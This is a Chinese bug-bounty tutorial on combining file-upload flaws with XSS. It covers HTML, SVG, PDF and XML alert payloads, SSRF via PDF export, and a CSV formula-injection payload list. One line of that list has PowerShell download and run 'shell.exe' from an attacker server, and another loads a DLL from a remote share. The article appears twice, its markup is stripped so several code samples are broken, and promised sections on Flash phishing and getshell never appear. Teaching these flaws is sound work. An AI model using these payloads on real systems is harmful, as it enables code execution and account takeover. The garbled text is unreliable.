0x1 前言哈喽师傅们好这次打算给师弟们分享的是XSS之Flash弹窗钓鱼和文件上传getshell各种姿势的内容然后先是给小白师傅们简单介绍下XSS漏洞和文件上传漏洞。然后后面给师傅们简单演示了XSS之Flash弹窗钓鱼然后后面很详细的介绍了文件上传和XSS漏洞的组合拳的好几种方式后面也是通过对一个站点的测试给师傅们演示了一波。后面给师傅们整理了下pdf木马制作的过程以及最后面分享下我一次在测文件上传最后也是getshell了。0x2 漏洞简介文件上传原理这里利用form表单标签和类型为file的Input标签来完成上传要将表单数据编码格式置为multipart/form-data类型这个编码类型会对文件内容在上传时进行处理以便服务端处理程序解析文件类型与内容完成上传操作。form methodPOST enctypemultipart/form-data input typefile namefile value请选择文件br / input typesubmit /form0x3 浅谈上传XSS的各种类型姿势允许上传HTML或SVG允许上传html或者svg都可以能导致xss也能导致任意URL跳转甚至还能导致SSRF很难利用因为核心还是js代码可控其中URL重定向漏洞可以参考之前我在先知写的文章https://xz.aliyun.com/t/15069html造成XSS就不多说了懂得都懂主要说说svg文件如何造成xss。检查思路1、创建一个恶意的svg文件输入如下内容?xml version1.0 encodingUTF-8? alert(XSS Attack!);2、上传到文件中并访问可以看到已经成功弹窗出来了XSS漏洞拓展如果目标存在导出功能如给svg导出为pdf这种功能那么可能存在SSRF可尝试使用其他协议更直观的查看如file://允许上传PDF文件可能存在PDF XSS和任意URL跳转但是由于属于浏览器层面的漏洞所以厂商大概率不认可。可以直接使用工具生成https://www.xunjiepdf.com/editor也可以按照网上的操作用迅捷PDF编辑器去操作效果都一样因为pdf一般是后端的组件有的开发可能配置成wkhtmltopdf /tmp/html123.htm /uploads/pdf.pdf那就可直接利用file协议进行利用如果网站本身存在预览JS的地方可以试试通过CVE-2024-4367来实现PDF XSS 获取Cookie、账户接管等。允许上传CSV文件如果允许上传CSV文件且上传的CSV文件的内容未经过处理过滤直接保存那么可以尝试上传具有恶意命令执行payload的CSV文件当其他用户下载该CSV文件时可能会导致命令执行。CSV文件的Payload如下DDE (cmd;/C calc;!A0)A0 span classlabel label-primarySUM(19)*cmd/span| /C calc!A0 1020cmd| /C calc!A0 cmd| /C notepad!A1 cmd|/C powershell IEX(wget attacker_server/shell.exe)!A0 cmd|/c rundll32.exe \\10.0.0.1\3\2\1.dll,0!_xlbgnm.A1检查思路上传恶意的CSV文件下载恶意的CSV文件观察下载后的CSV文件是否对等号等特殊符号做了处理payloads会否会成功执行如果能则说明存在问题0x4 组合拳实战测试html、svg文件上传打XSS漏洞师傅们可以看到找到下面的这个站点的这个功能存在文件上传我先尝试一手html文件html文件上传相对来讲常见点并且一般要是能够上传html文件成功基本上都可以打一个存储型XSS漏洞了html恶意弹窗代码如下html恶意弹窗代码如下!DOCTYPE html html langen head meta charsetUTF-8 meta nameviewport contentwidthdevice-width, initial-scale1.0 titleDocument/title scriptalert(618)/script /head body /body /html上传成功可以看到我这里上传的html文件的url路径下面尝试访问下这个路径看看里面的html恶意弹窗代码会不会执行可以看到我这里换个浏览器访问也是成功执行XSS弹窗了的上传svg恶意文件也是一样的svg恶意弹窗代码如下?xml version1.0 standaloneno? !DOCTYPE svg PUBLIC -//W3C//DTD SVG 1.1//EN http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd svg version1.1 baseProfilefull xmlnshttp://www.w3.org/2000/svg polygon idtriangle points0,0 0,50 50,0 fill#009900 stroke#004400/ script typetext/javascript alert(618); /script /svg也是一样换个浏览器访问照样是可以成功执行弹窗的制作pdf弹窗木马pdf编辑器下载地址如下https://www.xunjiepdf.com/直接打开然后新建空白页面然后点击属性然后点击右边的小点点然后出现下面的选项框点击新增js代码写入app.alert(618);js代码然后保存到本地然后也是按照上面的一样步骤也是可以打出一个存储型XSS漏洞上传XML文件打XSS漏洞上传xml文件必须CORS允许所有域 CORS 跨域资源请求(允许我们网站加载其他网页代码)xml它需要上传2个文件首先上传第一个xml文件(url地址我们首先拿到)然后再上传第二个xml文件xml1https://xxx.com/File/1/xxxxxx.xml?xml version1.0 encodingiso-8859-1? alert(/618/);然后上传xml2代码中的href填写xml1的上传链接路径?xml version1.0 encodingiso-8859-1? ?xml-stylesheet typetext/xsl href?CURL查看curl 域名 -H “Origin: https://baidu.com” -I0x5 总结这篇文章对于仪式内容的介绍和分享就到这里了然后后面要是有什么问题和需要交流的地方师傅们可以跟我讨论下里面的一些案例包括各种的打都写的蛮详细的对小白师傅比较友好哈最后希望这篇文章对师傅们有帮助哈网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取
浅谈src挖掘中—文件上传和XSS漏洞的组合拳,网络安全零基础入门到精通实战教程!
0x1 前言哈喽师傅们好这次打算给师弟们分享的是XSS之Flash弹窗钓鱼和文件上传getshell各种姿势的内容然后先是给小白师傅们简单介绍下XSS漏洞和文件上传漏洞。然后后面给师傅们简单演示了XSS之Flash弹窗钓鱼然后后面很详细的介绍了文件上传和XSS漏洞的组合拳的好几种方式后面也是通过对一个站点的测试给师傅们演示了一波。后面给师傅们整理了下pdf木马制作的过程以及最后面分享下我一次在测文件上传最后也是getshell了。0x2 漏洞简介文件上传原理这里利用form表单标签和类型为file的Input标签来完成上传要将表单数据编码格式置为multipart/form-data类型这个编码类型会对文件内容在上传时进行处理以便服务端处理程序解析文件类型与内容完成上传操作。form methodPOST enctypemultipart/form-data input typefile namefile value请选择文件br / input typesubmit /form0x3 浅谈上传XSS的各种类型姿势允许上传HTML或SVG允许上传html或者svg都可以能导致xss也能导致任意URL跳转甚至还能导致SSRF很难利用因为核心还是js代码可控其中URL重定向漏洞可以参考之前我在先知写的文章https://xz.aliyun.com/t/15069html造成XSS就不多说了懂得都懂主要说说svg文件如何造成xss。检查思路1、创建一个恶意的svg文件输入如下内容?xml version1.0 encodingUTF-8? alert(XSS Attack!);2、上传到文件中并访问可以看到已经成功弹窗出来了XSS漏洞拓展如果目标存在导出功能如给svg导出为pdf这种功能那么可能存在SSRF可尝试使用其他协议更直观的查看如file://允许上传PDF文件可能存在PDF XSS和任意URL跳转但是由于属于浏览器层面的漏洞所以厂商大概率不认可。可以直接使用工具生成https://www.xunjiepdf.com/editor也可以按照网上的操作用迅捷PDF编辑器去操作效果都一样因为pdf一般是后端的组件有的开发可能配置成wkhtmltopdf /tmp/html123.htm /uploads/pdf.pdf那就可直接利用file协议进行利用如果网站本身存在预览JS的地方可以试试通过CVE-2024-4367来实现PDF XSS 获取Cookie、账户接管等。允许上传CSV文件如果允许上传CSV文件且上传的CSV文件的内容未经过处理过滤直接保存那么可以尝试上传具有恶意命令执行payload的CSV文件当其他用户下载该CSV文件时可能会导致命令执行。CSV文件的Payload如下DDE (cmd;/C calc;!A0)A0 span classlabel label-primarySUM(19)*cmd/span| /C calc!A0 1020cmd| /C calc!A0 cmd| /C notepad!A1 cmd|/C powershell IEX(wget attacker_server/shell.exe)!A0 cmd|/c rundll32.exe \\10.0.0.1\3\2\1.dll,0!_xlbgnm.A1检查思路上传恶意的CSV文件下载恶意的CSV文件观察下载后的CSV文件是否对等号等特殊符号做了处理payloads会否会成功执行如果能则说明存在问题0x4 组合拳实战测试html、svg文件上传打XSS漏洞师傅们可以看到找到下面的这个站点的这个功能存在文件上传我先尝试一手html文件html文件上传相对来讲常见点并且一般要是能够上传html文件成功基本上都可以打一个存储型XSS漏洞了html恶意弹窗代码如下html恶意弹窗代码如下!DOCTYPE html html langen head meta charsetUTF-8 meta nameviewport contentwidthdevice-width, initial-scale1.0 titleDocument/title scriptalert(618)/script /head body /body /html上传成功可以看到我这里上传的html文件的url路径下面尝试访问下这个路径看看里面的html恶意弹窗代码会不会执行可以看到我这里换个浏览器访问也是成功执行XSS弹窗了的上传svg恶意文件也是一样的svg恶意弹窗代码如下?xml version1.0 standaloneno? !DOCTYPE svg PUBLIC -//W3C//DTD SVG 1.1//EN http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd svg version1.1 baseProfilefull xmlnshttp://www.w3.org/2000/svg polygon idtriangle points0,0 0,50 50,0 fill#009900 stroke#004400/ script typetext/javascript alert(618); /script /svg也是一样换个浏览器访问照样是可以成功执行弹窗的制作pdf弹窗木马pdf编辑器下载地址如下https://www.xunjiepdf.com/直接打开然后新建空白页面然后点击属性然后点击右边的小点点然后出现下面的选项框点击新增js代码写入app.alert(618);js代码然后保存到本地然后也是按照上面的一样步骤也是可以打出一个存储型XSS漏洞上传XML文件打XSS漏洞上传xml文件必须CORS允许所有域 CORS 跨域资源请求(允许我们网站加载其他网页代码)xml它需要上传2个文件首先上传第一个xml文件(url地址我们首先拿到)然后再上传第二个xml文件xml1https://xxx.com/File/1/xxxxxx.xml?xml version1.0 encodingiso-8859-1? alert(/618/);然后上传xml2代码中的href填写xml1的上传链接路径?xml version1.0 encodingiso-8859-1? ?xml-stylesheet typetext/xsl href?CURL查看curl 域名 -H “Origin: https://baidu.com” -I0x5 总结这篇文章对于仪式内容的介绍和分享就到这里了然后后面要是有什么问题和需要交流的地方师傅们可以跟我讨论下里面的一些案例包括各种的打都写的蛮详细的对小白师傅比较友好哈最后希望这篇文章对师傅们有帮助哈网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取
